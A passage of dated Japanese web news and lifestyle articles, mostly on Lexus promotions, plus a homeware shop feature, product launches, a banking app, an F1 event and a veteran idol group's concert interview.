所のおきて。よりよきものを作るためにコロコロ変える。今もその体質が抜けないね」高道「僕は若いころ、動かない歌ばかりで踊っている人がうらやましかったから、いま踊れるのが楽しくてしょうがない。もっと踊りたいですもん」晃「高道さんは芸達者で。中年のお姉さまにモテモテなんです。マダムキラーとも言われてるけど(笑)」あいざき「江木さんも66歳なのに体力ありすぎ、若すぎですよね」江木「心意気だと思う。ある意味でナルシストというか若々しくいようという自分がいるのかな。60歳過ぎても楽屋で鏡を見る時間が多いしね」晃「俺は昔からの先輩方と楽屋で一緒になると、『ずいぶん大きくなったな』って言われる。俺のことをまだ小学生扱いしているからね(笑)。もう上の孫が中学2年生なのに……」あいざき「みんな当時の感覚に戻るんですよね、コンサートのお客さんもそう。中高生まで僕たちを追いかけてくれた人がアイドルファンを卒業して、結婚して子育てを終えて、そしてまた青春に戻ってきてくれる。お互い少年少女みたいに若返って元気になって、明日からも頑張れる!」江木「青春広場だよね。奥さま方、ぜひいらして発散してください」来年1月12日に東京・GINZA Lounge ZEROにて「New Year Live」、4月20日に東京・表参道GROUNDにて「spring Live」開催予定。
2018年11月12日生活道具の最新トレンドを踏まえて、東京・高円寺に店舗を構える〔TASTE〕(テイスト)で取り扱っているこだわりのアイテムを取材してきました。一人暮らしから夫婦、ファミリー生活まで、暮らしに“ちょっと良いもの”を取り入れてみると、毎日がもっと楽しくなります。おうち作りはもっと豊かになる!普段の生活を“ちょっと良くする”日用品の、最新トレンドをご存知でしょうか。今回は、ほかではなかなかお目にかかれないアイテムを、じっくりとご紹介していきます!生活道具の大宇宙が広がっていました……〔TASTE〕の内観取材にやって来たのは、東京・高円寺に店舗を構える生活道具セレクトショップ、〔TASTE〕。店内に一歩足を踏み入れると、ただならぬ雰囲気をまとったアイテム群が出迎えてくれました。スタッフも筋金入りのエキスパート!商品の説明を行ってくださったのは、スタッフの鈴木愛さん。飲食店のキッチンやアウトドア雑誌の編集の経験を持つ、この道のエキスパートです。プライベートでは登山やキャンプ、家でドリップコーヒーを楽しんだりしているそうです♪そんな鈴木さんが厳選した、最新トレンドの「業務用」「海外民芸」「アウトドアMIX」に沿った、3つのアイテムを見ていきます。お米などの保管に最適なプロ仕様のフードコンテナーキャンブロの《フードコンテナー》(1,800円〜3,400円)さて、最初にご紹介するのは、残りの量や中身がひと目で分かる透明なストレージコンテナー。業務用テーブルウェアや厨房機器のメーカー、アメリカのキャンブロ社の製品です。密封性が高く、アメリカのレストランなどではソースやスープといった液体を入れて使うこともあるそうです。サイズは4種類あります。1.9ℓと3.8ℓ、5.7ℓと7.6ℓはそれぞれ幅が同じ高さ違い。重ねて置くことができるのがメリットです。スクエア型なので、キッチンスペースを有効活用でき、安定感もあります。フード以外にも、ペットフードやガーデニングの肥料を入れたりと、家中のあらゆるアイテムのストックとして便利ですね。渦巻型が使えるフィンランドの蚊取り線香入れ《フィンランドの蚊取り線香入れ》(3,500円)〔TASTE〕では、フードコンテナーのほかにも様々な海外のアイテムをセレクトしています。お次の生活道具は海外の民芸品。こちらはフィンランドのブリキの蚊取り線香入れです。フィンランドでは余暇を森や湖のコテージで過ごす際に、夏場は日本同様に渦巻き型の蚊取り線香が欠かせないのだそう。蓋が付いているので、灰が飛び散る心配はありません。煙は蓋に空いている穴から出ていきます。本体の片側には取手がついているので、持ち運びは楽チン。キャンプやガーデニングなど屋外はもちろん、室内のインテリアとも馴染みやすいデザインです。コーヒー好きのための富士山型のドリッパーIFNi & ILCANAの《MT.FUJI DRIPPER》(左がレギュラーサイズ:3,000円、右がラージサイズ:3,900円)最後にご紹介するのは、アウトドアでの使用にも耐えるコーヒードリッパー《MT.FUJIDRIPPER》です。ステンレス製のワイヤーで作られたそのフォルムは、ひっくり返すと富士山に!一般的な外壁のあるタイプと異なり、蒸らしを均一に行うことができます。そのため、抽出時間が短縮され、雑味が出る前にコーヒーを抽出することができる画期的なシロモノなんです。カラビナを使ってバッグに取り付ければ、お出かけが一層楽しくなっちゃいます持ち手の部分はフックなどに吊るしやすい形状になっているので、収納や持ち運びにも便利です。サイズはレギューラーとラージの2種類で、ラージタイプはケメックス6cup対応。自宅でじっくりドリップを楽しみたい人にも、公園やキャンプ場など屋外でコーヒーを楽しみたい人にもオススメのドリッパーです。季節ごとに新商品が入荷♪キッチンウェアが並ぶ棚ご紹介してきた商品のほかにも、〔TASTE〕にはこだわりの生活道具が数多く揃っています。季節ごとに新商品が入ってくるので、常に入荷が待ち遠しくなっちゃいますね。そんな中、最新トレンドの「業務用」「海外民芸」「アウトドアMIX」の3つに共通するのは、「長く使われている」または「長く使うことを想定している」点です。良いものは、忙しない時の流れを忘れさせてくれるのかもしれません。〔TASTE〕にはオンラインショップもあります。遠方の人は是非ともHPをチェックしてみてはいかがでしょうか。【店舗情報】●店舗名TASTE(テイスト)●住所東京都杉並区高円寺南3-45-13-2F●営業時間12:00-20:00●定休日なし●TEL03-3318-0334〔TASTE〕HP※価格はすべて税別で表記しています。
2018年06月24日興和株式会社は、新製品の発売に伴い19歳~69歳の男女442名(男性21% 女性79%)に、足爪に関する意識調査を行った。足爪に関するアンケートこの調査結果によると、足爪をケアしていると答えた女性は全体の約4割。興味深いのは「自分はモテると思うか?」という質問に「モテると思う」と回答している女性の60%が「足爪のケアをしている」と回答している点だ。また、「モテないと思う」と回答している女性で「ケアしている」と答えたのは約半分の27%に留まっている。「ディープセラム for FOOT」興和株式会社から発売された「ディープセラム for FOOT」は、これから露出の増える足爪の美容液だ。装飾的な意味合いで足のネイルケアは浸透しつつあるが、足爪自体の美容目的で企画された商品は珍しいのではないだろうか。一般的なネイルケアはオイル・クリームが主流だが、この商品は水溶性で爪自体に浸透して補修するタイプである。速乾性が高く、靴下を履くことも考慮して製剤の抗菌保存剤が配合されているのが特徴だ。また、薄い・割れやすい・弱い爪の内部に浸透して、内側から健康な爪を作ることを目的としている。足爪はデリケート足爪は生え変わりに約1年を必要とするデリケートな部位で、短期間では効果の出にくい箇所である。顔と同じく毎日のケアがモノをいう箇所であろう。内外共に輝く女性とは、目に付きにくい場所だからこそ、日々の手入れが出来る細かい配慮が出来る女性ではないだろうか。(画像はプレスリリースより)【参考】※興和株式会社※興和株式会社Value Press!
2017年04月07日10月1日(土)~10月14日(金)の2週間にわたり、アメリカ大使館農産物貿易事務所主催「Taste of America2016(テイスト・オブ・アメリカ 2016)」が開催となる。今年で第6回目となる本イベント。今年のTOAのテーマは、TOGETHERだ。アメリカのフードカルチャーをこよなく愛する都内の飲食店約50店舗が中心となり、各店にてアメリカの野菜をはじめ、さまざまなアメリカ食材を使った特別メニューが提供される他、スタンプラリーアプリで、スタンプを貯めるとアメリカンフードのプレゼントが当たるなどの企画も展開される。今年は「食」だけにこだわらず、食のシーンを取り巻くあらゆる人、物、事(旅)と連動した企画も多数。9月23日~25日「ツーリズム EXPO JAPAN 2016」にTOAカフェが出店。10月10日(月・祝)には、「青山ファーマーズマーケット」に出店。さまざまなアメリカンメニューが楽しめる。豪快で、エネルギッシュなイメージのあるアメリカンフードだが、都内の有名な美食レストランが多く参加するこのイベントで、そのイメージは覆るかも?ピザやハンバーガー以外にも、アメリカが誇る料理の数々をこの機会に味わっていてはいかが。(text:cinemacafe.net)
2016年09月27日レクサス(LEXUS)が国際デザインコンペティション「LEXUS DESIGN AWARD 2016」の入賞作品を発表した。「Anticipation(予見)」をテーマにデザインを募集した同コンペティション。73ヶ国から1,232作品が集り、昨年の11月に審査員やメンターにより入賞12作品が選出された。入賞作品のうち4作品の受賞者は、建築家でデザイナーのネリ・アンド・フー、エレナ・マンフェルディーニ、デザイナーのマックス・ラム、アーティストで建築家のスナーキテクチャーから助言を受け、プロトタイプを制作。プロトタイプは他8作の入賞作品のパネルとともに4月11日から17日まで、イタリア・ミラノで開催される「ミラノデザインウィーク2016」のレクサス会場にて展示される。会場では最終審査を行い、プロトタイプ4作品の中からグランプリ1作品を決定する予定だ。プロトタイプが制作される4作品のうち、荒木宏介、前谷典輝、村岡明からなるチームAMAMによる「AGAR PLASTICITY - A POTENTIAL USEFULNESS OF AGAR FOR PACKAGING AND MORE」は、寒天からつくられた、環境保全に考慮した新しい梱包資材。ベグム・アヤスカン、ピケ・アヤスカンによる「TRACK」は紫外線に反応して変色する溶液を用いたもので、時間を目に見える形で表すことができる。これに、アンジェリン・ローラ・フェヌータによる、モジュールの原理を活かした着る人の好みのスタイルに応じてシルエットを自由に変えることができる衣服「Shape Shifters」、ジャン・ミョンシクによる手に取る人の想像力で多様な作品を生み出すことができるブロック「DADA」を合わせた4作品のプロトタイプが制作される。パネル展示作品は、丸形彩実による生息地や生態に応じてデザインされた動物用の服「aniknown」、山崎卓馬の土に還るというコンセプトを視覚化し落ち葉で作成したテーブルや封筒「Bio-Vide」、ディーパック・ジャワハル&イリーナ・ボグダン(Deepak Jawahar & Irina Bogdan)の空間を体感させるスローモーションドア「Slow Door」など。
2016年02月08日LEXUSは、全世界の次世代を担うクリエイターを対象とした国際デザインコンペティション「LEXUS DESIGN AWARD 2016」に入賞した12作品を発表した。「Anticipation」(予見)をテーマにデザインを募集した同コンペでは、73カ国から1,232作品の応募があり、昨年11月、世界中で活躍する審査員・メンターによる厳正な審査の結果、入賞12作品が選出された。うち4作品の受賞者は、世界的クリエイターをメンターとしたセッションを通じて、プロトタイプを制作するという。その4作品に選ばれたのは、寒天からつくられた梱包資材の「AGAR PLASTICITY - A POTENTIAL USEFULNESS OF AGAR FOR PACKAGING AND MORE」(AMAM、荒木宏介、前谷典輝、村岡明)、子どもたちの感性を育てるブロック「DADA」(ジャン・ミョンシク)、モジュールの原理をデザインに活かした衣服「Shape Shifters」(アンジェリン・ローラ・フェヌータ)、紫外線に反応して変色する溶液を用いて時間を目に見える形で表す時計「TRACE」(STUDIO AYASKAN、ベグム・アヤスカン、ビケ・アヤスカン)。これらは、ほかの入賞8作品のパネルと共に、今年4月にイタリア・ミラノで開催される「ミラノデザインウィーク2016」のLEXUS会場にて、4月11日~17日まで展示され、入賞者は会場で自身の作品についてのプレゼンテーションを行う機会が提供されるということだ。また、会場での最終審査を経て、プロトタイプ4作品の中から「LEXUS DESIGN AWARD 2016」の頂点となるグランプリ(1作品)が決定するということだ。なお、入賞作品の詳細や審査会の様子は、「LEXUS DESIGN AWARD」公式Webサイトに掲載されている。
2016年01月27日住信SBIネット銀行はこのたび、「マネーフォワード for 住信SBIネット銀行」のAndroid版の提供を開始した。iOS版は11月30日に提供を開始している。○「マネーフォワード」をベースに顧客向けに便利な機能・情報を拡充したアプリ「マネーフォワード for 住信SBIネット銀行」は、マネーフォワード社が提供する自動家計簿・資産管理サービス「マネーフォワード」をベースに住信SBIネット銀行の顧客向けに便利な機能・情報を拡充したアプリケーション。住信SBIネット銀行によると「既に提供を開始しているiOS版のお客様からは、口座の残高がすぐに確認できたり、お得なお知らせなどが便利と好評を得ています。今後も、より便利に使いやすいようにリニューアルしていく予定」としている。Android版はGoogle Playからダウンロードして利用できる。なお、iOS版はApp Storeからダウンロードして利用できる。
2015年12月24日レクサス(LEXUS)がブランド体験スペース「INTERSECT BY LEXUS」の海外拠点となる「INTERSECT BY LEXUS - DUBAI」をドバイにオープンした。「INTERSECT BY LEXUS」は“都市とつながり、人と人、人とクルマが交わる”というテーマのもと、レクサスが考えるライフスタイルを体験できる、ブランドの発信拠点。日本では13年に東京・南青山に第1号店がオープンしており、2号店となる「INTERSECT BY LEXUS - DUBAI」は初の海外拠点。ドバイ国際金融センター(DIFC)の中心部に位置し、デザイン・アート・ファッション・カルチャー・音楽・テクノロジーといったさまざまなライフスタイルを追い求める人々のサードプレイスとして設立した。「INTERSECT BY LEXUS - DUBAI」は第1号店と同じく、インテリアデザイナーの片山正通が空間デザインを担当。スペースは2フロアからなり、下層階(ローフロア)は、レクサスのコンセプトカーやインスタレーション展示のあるエキジビジョンスペース「Garage」を備え、上層階(アッパーフロア)はネットワーキングを促進するラウンジ、レストラン、ライブラリーラウンジや、レクサスが提供するライフスタイルアイテム「CRAFTED FOR LEXUS」のショップを設置した。なお、「INTERSECT BY LEXUS」は今後ニューヨークにもオープンを予定している。
2015年12月17日住信SBIネット銀行は30日、マネーフォワードとの業務提携サービスの第1弾として、「マネーフォワード for 住信SBIネット銀行」の提供を開始した。「マネーフォワード for 住信SBIネット銀行」は、マネーフォワードが提供する自動家計簿・資産管理サービス「マネーフォワード」をベースに住信SBIネット銀行の顧客向けに便利な機能・情報を拡充したアプリケーション。ベースとなる「マネーフォワード」は、金融機関の利用履歴・残高を自動取得し、自動で家計簿を作成するサービス。2014年に「グッドデザイン賞」を受賞するなど、高い評価を得ている全自動家計簿サービスとなっている。「マネーフォワード for 住信SBIネット銀行」は、住信SBIネット銀行の残高がホーム画面に表示されるほか、住信SBIネット銀行のスマートフォンサイトへシームレスに遷移できるなど、住信SBIネット銀行の顧客が便利に利用できるアプリケーション。また、スマートフォンだけでなくWEB版のサービスもあわせて提供する。スマートフォンアプリ版はAppStoreからダウンロードして利用可能。Android版は後日提供予定。WEB版はこちら。
2015年11月30日トヨタ自動車(トヨタ)は8月20日、同社の高級車ブランド「LEXUS」のSUVラインアップのフラッグシップモデル「LX570」を9月14日に発売すると発表した。価格は1100万円。LXは1996年にLEXUS初のSUVとして北米で発売されて以来、北米、中近東、およびロシアを中心に海外で販売を拡大してきた。今回、LX570の導入に合わせて、3列シートのラグジュアリーSUVとして日本でも販売する。LX570はV8・5.7lエンジンを搭載し、2000r.p.m.から最大トルクの約90%を発生させるワイドなトルクバンドを実現。スーパーインテリジェント8速オートマチックと組み合わせることで、オンロードでは伸びやかな加速を、オフロードでは低・中速域での力強さを発揮する。また、LEXUSとして初めてCUSTOMIZEモード搭載のドライブモードセレクトを採用。CUSTOMIZEモード時には、パワートレーン、シャシー、空調の各制御の組み合わせを自由に選択でき、よりドライバーの嗜好に応じた走行モードを実現する。さらに、オートエアコン、ステアリングヒーター、シートヒーター・シートベンチレーションの各機能を連動して作動させる「レクサス クライメイト コンシェルジュ」や、降車時に自動で車高調整を行う「乗降モード」などの機能を標準装備。このほか、ミリ波レーダーと単眼カメラを組み合わせ、高い認識性能と信頼性を両立し、多面的な安全運転支援を可能にした予防安全パッケージ「Lexus Safety System +」を国内で初めて採用した。
2015年08月21日アジェンダは、OS X Mavericks対応のMac用宛名印刷ソフト「宛名職人 for 10.9」の販売を9月25日より開始すると発表した。価格は6,750円。アジェンダ直営オンラインショップ限定でダウンロード版のみの販売となる。「宛名職人 for 10.9」は、昨年発売した「宛名職人 Ver.21」をベースに、2016年の干支である「申(さる)」の年賀状デザインを含む新規テンプレート260点以上を収録している。宛先ごとに差出人を個別設定できるほか、「フォルダ」や「タグ」で宛先をまとめておくことが可能。収録フォントは76書体(日本語16書体、英数60書体)で、イラストはダウンロードサービスを利用した場合、13,000点以上が使用できる。対応OSはOS X Mavericksのみ。
2015年08月20日LEXUSは、2015年6月に発表した空飛ぶスケートボード「LEXUS ホバーボード」をつくるプロジェクト「Amazing in Motion」の全容を公開した。同プロジェクトは、「不可能と思われることを可能」にし、「動き(motion)を通して楽しさを想像したい」という思いを元に、同じ情熱を持つパートナーと協業で空飛ぶスケートボード「LEXUS ホバーボード」を開発するというもの。「LEXUS ホバーボード」は「LEXUSのデザインや技術に対する想いを形にした」ものと位置づけられたプロトタイプで、低温保持装置をふたつ備え、その中で超伝導体が液体窒素によってマイナス197度まで冷却されて永久磁石のレールの上に置かれることで、本体が浮上する仕組みとなっている。また、このプロジェクトのパートナーとして、磁気浮上技術を専門とするIFW Dresdenとevico GmbHから科学者チームが開発に参加。そのほか、プロスケーターのロス・マクグラン氏が、「LEXUS ホバーボード」のための技術を組み込んだ特設ホバーパークにてテストライディングを実施。現在公開されている動画は、テスト走行の様子をカンヌライオンズフィルム部門金賞などの受賞歴を持つヘンリー=アレックス・ルビン氏が撮影したもので、動画内にはドローンを活用して撮影したと見られる場面もある。産業/輸送用の超伝導磁気ベアリングを開発するevico GmbHのCEO オリバー・デ・ハス氏は「レールの磁場がホバーボードの超伝導体の中に『凍結』されることで、ボードとレールの間に一定の距離が保持され、浮くことができる。この力は、ホバーボード上で人が立ったりジャンプしたりできるほど強いものだ」と語った。その一方、テストライダーのロス・マクグラン氏は「20年間スケートボードをしてきたが、摩擦のない状態でホバーボードに乗るためには、特に姿勢やバランスについて一から技術を習得しなければならなかった。すべてが新しい経験だった」とコメントした。なお、「LEXUS ホバーボード」は先述の通りプロトタイプで、販売の予定はないということだ。
2015年08月05日レクサス(LEXUS)が2015年ミラノデザインウィーク中に発表したインスタレーション「LEXUS -A JOURNEY OF THE SENSES」は、ふたりの気鋭デザイナーとの取り組みによって実現した。空間デザインを手がけたフィリップ・ニグロ(Philippr Nigro)氏と、仏雑誌『Le Chef』で「世界を代表するシェフ100人」にも選ばれた米田肇シェフだ。レクサスの車がもたらす、贅沢な安心感やものづくりに対する緻密なこだわりは、ふたりのアーティストの解釈を通じ、食を通じたユニークなアプローチに変換された。フィリップ氏は今回の展示の会場設計を考えるにあたり、まず米田氏の想いに耳を傾けることから始めた。「今回のエキシビションは『雨』『木』そして『地球』という3つの構成になっており、彼が表現したいことをどのように空間デザインとして効果的に見せられるかを考え、その方法を彼に提案しました」。一方、「元々、料理を作っている感覚がない」と話す米田氏。「メッセージや発信したい想いを、食材を使って形にしていく」というのが彼のスタイルだ。幼い頃からの自然との触れ合いの中で得た美意識を、“Inside-Out”のインスタレーションに落とし込んだという。食を通じて来場者に五感で感じて欲しかったのは、地球上の自然が循環しているということ。「宇宙の神秘に料理の答えがある」という米田シェフの考えは、今回の五感の旅を巡る食のインスタレーションに現われている。フィリップ氏とのコラボレーションによって生み出された五感を解放する為の空間は、3つのセクション(シーン)で構成された。シーン1は、米田シェフが愛車のレクサスを雨の日に運転したときの体験から生まれたもの。生命の恵の雨に包まれながら疾走する爽快感を、パチパチと弾ける雨の雫のキャンディーとフロントガラスに打ち付ける雨音、そして光のインスタレーションにより、体の内・外から降りしきる“雨”を感じることができるのだ。シーン2では、口に含むとパンと弾けて樹液のようなキウイビューレが溶け出す球体が提供された。木の幹の中をイメージした丸い空間の中でその瑞々しい食感が口の中に広がると、森の静けさと一体になったような神秘的な気持ちを味わえる。そして最後に行き着くシーン3で待っているのは、牛・魚介・昆布・4種類以上の野菜を煮込んだ温かいスープ。会期中、1日12食限定で振る舞われたエクスクルーシブメニューでは、このスープに替え、米田シェフの代表作である「地球のサラダ」が振る舞われた。空、雲、大地が映し出された丸いテーブルで、30種類以上の野菜を用いたサラダを食す。スープもサラダも、自然の恵みへの感謝を凝縮した一品。「空間芸術に食を取り込んだという意味でも、2万食を対応したという意味でも、新しいチャレンジでした。例えばレストランやカフェを既存のデザインされた業態として見るならば、今回、『インスタレーション・ガストロノミー』という新しい分野をデザインできたと考えています」。レクサスとの取り組みによって得られた成果を、米田氏はこのように語った。フィリップ氏と米田氏の両氏にインスタレーションの感想を聞くと、ふたりが共通して述べたのは、「(このプロジェクトが)お互いにとって新しい方向性やビジョンを照らすという、思いがけない結果を生み出した」ということ。想像を超える体験と感動ーー来場者にとっても「LEXUS -A JOURNEY OF THE SENSES」で得たのは、こうした心地よい“あと味”だったのではないだろうか。--前編「レクサスが「食」を通して表現した、日本の“おもてなし”とイノベーション」を読む。
2015年07月21日LEXUSは、米ニューヨークで4月1日より開催されている「2015年ニューヨーク国際オートショー(ニューヨークオートショー)」において、新型プレミアムクロスオーバー「RX450h」と「RX350」を発表した。RXは、1998年に初代モデルを北米などで発売以来、LEXUS販売を支える主力モデルとして位置づけられており、新型RXは「RXでありながら、RXであることを超えていく」を命題に開発されたという。具体的には、流麗さと力強い存在感を兼ね備えた外観デザインや、操作性に配慮した先進機能と上質感が融合した内装を実現したほか、サスペンションやボディ構造の改良により操縦安定性をさらに高めると共に、ミリ波レーダーとカメラを用いた予防安全パッケージ「Lexus Safety System +」を導入し、多面的な安全運転支援も図っているという。なお、新型RXの日本での発売は、2015年秋以降を予定している。
2015年04月02日3月5日、六本木・CoLoR TOKYO NIGHT CAFEにて、雑誌『GOLD』『LEON』各編集部協力のもと、「The eve of F1 エキサイティングナイト」がおこなわれました。これは現在開催中の「The F1展~華麗なるフォーミュラ・ワンの世界~」のオープニング記念イベントです。ゲストとして、ファッションモデル・タレントの平子理沙さん、モデルの相沢沙世さん、生方ななえさん、パンツェッタ・ジローラモさんが登場しました。イベントは、『GOLD』の内山編集長と『LEON』の前田編集長による乾杯からスタート。F1優勝者が表彰台でおこなうシャンパンファイトに使われるF1公式シャンパン「MUMM」が特別に提供されました。そして、実はデビューがF1リポーターという平子さんとジローラモさん、そして前田編集長が「F1スペシャルトークショー」を繰り広げました。平子さんが91年のブラジルグランプリの思い出について語ると、前田編集長がそれを受けてマニアックな話をするなど、F1への熱い想いを披露。何度も観戦の経験があるジローラモさんも交え、間近に迫った開幕に対する期待感溢れるトークでした。続いておこなわれたのは、女性誌『GOLD』のモデルの相沢さん、生方さんによる、「F1モナコ・グランプリ観戦ファッション」をテーマとした「F1ファッションスペシャルステージ」。内山編集長によるスタイリングで、相沢さんはモナコ・グランプリ観戦スタイルのラグジュアリーな白いワンピース姿で、生方さんはシンガポール・グランプリ観戦スタイルのピンクのギンガムチェックのパンツスタイルで登場しました。世界中でおこなわれるF1グランプリだけに、各国に合ったスタイルで観戦するのも、女性らしいF1の楽しみ方かもしれません。さらに、90年代に一世を風靡したDJ OSSHYによるディスコタイムがスタート。F1が最も盛り上がっていた90年代を彷彿とさせる音楽で、会場全体が盛り上がりました。F1は、今年、新たにHondaがチャレンジすることもあり、ブームの再来が予想されます。「The F1展」に足を運んで、ブームに先駆けてF1についてチェックしておくとよさそうです。「The F1展」は、西武池袋本店、西武渋谷店、そごう横浜店で開催中(会期は3月4日~15日まで※横浜店は9日まで)です。それぞれテーマが異なっており、西武池袋本店では「学ぶ」をテーマに、1964年日本の自動車メーカーとして初めてF1に参戦したHondaの歴史を、写真やレーシングスーツなど貴重なF1アイテムで振り返ります。西武渋谷店は「感じる」がテーマ。F1マシンの軌跡を光で再現し、床と壁を縦横無尽に駆け巡る光のインスタレーション(装置)で、時速300kmでサーキットを疾走するF1マシンのスピードを体感できます。「遊ぶ」をテーマにしたそごう横浜店では、2008年にサーキットで活躍したRA108のコックピットに乗って写真を撮れるイベント(小学生以下限定)のほか、1/32スケールのF1マシンを自らコントローラーを操作してコースを走らせることのでこるスロットカーレースなど、子ども楽しめるコンテンツが多数用意されています。2015年F1グランプリの開幕は、3月13日です。今年はモータースポーツの最高峰であるF1から目が離せなくなりそうです。・Honda 公式サイト
2015年03月06日LEXUSは、「LEXUS AMAZING EXPERIENCE」と題した体験型プログラムを数多く提供しているが、その中でも注目なのがドライビングレッスン。サーキットを借り切り、講師陣も現役のレーシングドライバーとあって、多くのクルマ好きから人気を集めている。そのドライビングレッスンの第3回目が、10月31日~11月1日に大分県日田市の大分オートポリスで実施された。2013年8月13日に行われた第1回、2014年3月28日に行われた第2回の様子も振り返りながら、第3回の模様を紹介する。○富士スピードウェイで行われた第1回・第2回「LEXUS AMAZING EXPERIENCE」ドライビングレッスンの第1回、第2回は、静岡県の富士スピードウェイを借り切って行われた。前述したとおり、講師陣は現役レーシングドライバー、使用したクルマは、スーパーカー「LFA」とレーシングカー「IS F CCS-R」などである。クルマを“遊び”“愉しむ”をコンセプトに、実践的なレッスンからゲーム性の高いレッスンが用意された。○第1回・第2回を凌ぐ盛況ぶりをみせた第3回のレッスン第3回は、大分オートポリスを舞台に開催された。10月31日(金)~11月1日(土)の2日間にわたる日程で、プログラムの内容も大幅にリニューアル。はじめにランチを囲んだオープニングパーティが開催され、プリンシパル・木下隆之氏から「RC F」と「RC350」でレッスンできると告げられた。ともに国内では一部のジャーナリスト以外は乗ったことのないクルマだったため、参加者からどよめきが起こった。午後からいよいよサーキットに出る。ウォーミングアップランののち、インストラクターが運転するクルマをトレースし、ベストなライン取りと加速・減速のタイミングを体験できるプログラムが開始された。一方、ピット裏のパドックでは、段ボールが高く積み上げられた視界の狭いコースを冷静に走行し、ラップタイムを競うというプログラムを用意。最初は緊張気味の参加者たちも、回を重ねるごとに上達し、笑顔が絶えない。初日最後は、インストラクターを助手席に乗せ、昼から取り組んだ練習の成果を評価してもらうプログラムが行われた。視界の狭いコースのラップタイムの結果と合わせ、上位3人が表彰されるとあって参加者の気合いが更にあがったという。その後、コンセプトカー「RC F CCS-R」のデモ走行が披露され、参加者は食い入るように疾走するクルマを眺めた。○現役レーサーのテクニックを助手席で体感2日目は、スーパーカー「LFA」と最新「RC F」を交互にドライビングできるプログラムでスタートした。LEXUS最高峰の「LFA」を操った参加者は、世界限定500台のスーパーカーによるサーキット走行に興奮を隠しきれない様子。また「RC F」では、初日よりも速度を上げることを許されてドライビング。なおこの間、ピット内ではドライビングクリニックが行われ、前日の走行時にデータロガーが残した記録をもとに、LEXUS Racing所属の伊藤大輔選手の走りと比較しながら、参加者自身のドライビングテクニックを振り返る。全日程の最後には、レーシングドライバーが運転する「RC F」に参加者が同乗し、次元の異なる速度域・限界走行を体感するレーシングタクシーを実施。一般道を流すような落ち着ききったプロのドライビングテクニックに多くの参加者が魅入ったようだ。第3回目の「LEXUS AMAZING EXPERIENCE」は大盛況のうちに終了したが、LEXUSによると来年も開催の予定だという。今後のプログラムは随時公式ホームページで発表されるが、メールアドレスを登録すれば、希望プログラムの開催時にメールでの案内を受け取れる。
2014年12月02日オービックビジネスコンサルタントは、中小企業向け基幹業務パッケージ「奉行シリーズ」から、新たなラインアップとして、クラウド環境に対応した「奉行i8 forクラウド」を12月17日より発売を開始する。同製品は、対応するパブリッククラウドサービス(IaaS)上で奉行i8シリーズの動作保証とクラウド運用の専用サポートサービスを提供するもの。基本的に、製品・オプションのバリエーションはオンプレミスの奉行i8シリーズと同一となる。発表時点では、日本マイクロソフト提供の「Microsoft Azure」、日本IBM提供の「SoftLayer」、「BIGLOBE クラウドホスティング」の3つのパブリッククラウドサービスの対応が予定されている。同社はクラウド環境で意識される2つのコストに注目し、「継続コスト」と「初期コスト」のいずれかを重視する場合に導入しやすい2つの価格プランを提供する。「継続コスト重視」プランの3ライセンスの年間総額は、製品価格120万円、OBCメンテナンスサポートサービス利用料年額24万円の合計144万円となる。「初期コスト重視」プラン3ライセンスの年間総額は、初期費用が30万円、OBCメンテナンスサポートサービス利用料が年額48万円(平成27年春頃に、月額支払いのプランを発売予定)の合計78万円となる。同製品のラインアップは以下のとおり。
2014年11月25日高級車ブランド「LEXUS(レクサス)」が11月5日(水)から東京・南青山のブランド発信拠点「INTERSECT BY LEXUS -TOKYO」で、約1か月間限定のショートフィルムシアターを開設!それを記念して11月7日(金)、同会場でトークショーが行われた。駆けつけたのは国内のショートフィルム普及の“先駆者”で「ショートショートフィルムフェスティバル & アジア」(以下:SSFF & ASIA)代表を務める俳優・別所哲也、そして同会場で上映されるショートフィルムに出演する女優・モデルの広瀬アリス、歌手でKの3人。それぞれの視点で、ショートフィルムが持つ魅力について語り尽くした。従来の“高級”とは異なる価値として“Progressive Luxury”を追求するという「LEXUS」のブランドビジョンのもと、グローバルなスケールでそのプレミアム・ブランドとしてのイメージ強化・確立に向けた様々な取り組みの一環――それが「LEXUS SHORT FILMS」プロジェクトだ。『英国王のスピーチ』『イングロリアス・バスターズ』といったオスカー受賞作で知られるインディペンデント系映画会社ザ・ワインスタイン・カンパニー(以下:ワインスタイン社)と協同し、将来有望なクリエイターを支援する。この日はそんな「LEXUS SHORT FILMS」シリーズ第2弾として製作された、少女マンガのようにキュートで切ない恋愛ストーリー『Operation Barn Owl』を上映。加えて、広瀬さんが“レンタル彼女”を好演する『FAKE』(SSFF & ASIAとUULAの共同製作)、Kさんが演技に初挑戦した『ビタースウィート~オトナの交差点~ 秋子篇』(日本ネスレ製作)の計3本がお披露目された。「ライフスタイルにこだわりを持ち、感度の高い方々がショートフィルムを通して繋がっていく。そんな場所作りができれば何より嬉しい。才能は誰かに発見され、応援してもらうからこそ花開くもの。クリエイターにとっては第一歩を踏み出す場所にもなる」とシアター開設の意義を熱弁する別所さん。一方、ショートフィルムの撮影を初体験した広瀬さんは「撮影は3日間。本当にハードで…」と苦労をふり返り、「床で寝転がるシーンでは、リアルに寝ちゃって(笑)。それと夜中の2時に水族館で撮影したんですが、お魚も寝ちゃっていて」。劇中では男性からフラれてしまうシーンもあり、「ギャラリー、しかもカップルだらけに囲まれた状態でフラれるんで、それが一番ツラかった」とも。それでも「今後もショートフィルムに挑戦したい」と意欲を燃やした。プライベートでは新婚ホヤホヤのKさんは、妻から浮気を疑われるミュージシャンという役どころをコミカルに好演。「台本を読んだら、いきなりシャワーシーンがあって。いつ撮影が始まってもいいように、2か月間トレーニングをしましたが、(映像には)せっかく鍛えた腹筋が映っていなかった(笑)」とガッカリした表情を浮かべたが、「自分に合う役があれば、今後もチャレンジしたい」と俳優業に強い関心を示した。さらに、Kさんは「いまはネットの時代で、映像もパソコンやスマホで見られる。でも映画館と同じように2時間の作品を見るのは大変だから、10~15分の映像が感動しやすい」とショートフィルムの特性に着目。これには別所さんも感激しきりで「まさに模範解答!ぜひ、ショートフィルムのアンバサダーになってほしい」とKさんにラブコールを送った。(text:cinemacafe.net)
2014年11月08日